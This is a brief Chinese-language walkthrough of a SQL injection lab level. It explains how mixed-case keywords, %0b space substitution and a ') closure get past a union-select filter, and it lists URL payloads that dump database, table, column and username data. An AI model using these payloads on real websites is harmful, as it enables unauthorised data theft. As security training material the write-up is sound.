一、这关没有过滤单独的union和select,而是过滤了union+select,试了一下大小写混合也还是能绕过
二、注释符用%0b替代,然后试闭合符号,加单引号报错而双引号不报错,然后尝试单引号加一个括号,回显正确,则闭合符号为’)
三、判断显示位
?id=100')%0BuNiOn%0BSeLect%0B1,2,3;%00
四、爆数据库
?id=100')%0BuNiOn%0BSeLect%0B1,(select%0Bgroup_concat(schema_name)%0Bfrom%0Binformation_schema.schemata),3;%00
五、爆表
?id=100')%0BuNiOn%0BSeLect%0B1,(select%0Bgroup_concat(table_name)%0Bfrom%0Binformation_schema.tables%0Bwhere%0Btable_schema=database()),3;%00
六、爆列名
?id=100')%0BuNiOn%0BSeLect%0B1,(select%0Bgroup_concat(column_name)%0Bfrom%0Binformation_schema.columns%0Bwhere%0Btable_name='users'),3;%00
七、爆数据
?id=100')%0BuNiOn%0BSeLect%0B1,(select%0Bgroup_concat(username)%0Bfrom%0Busers),3;%00
over~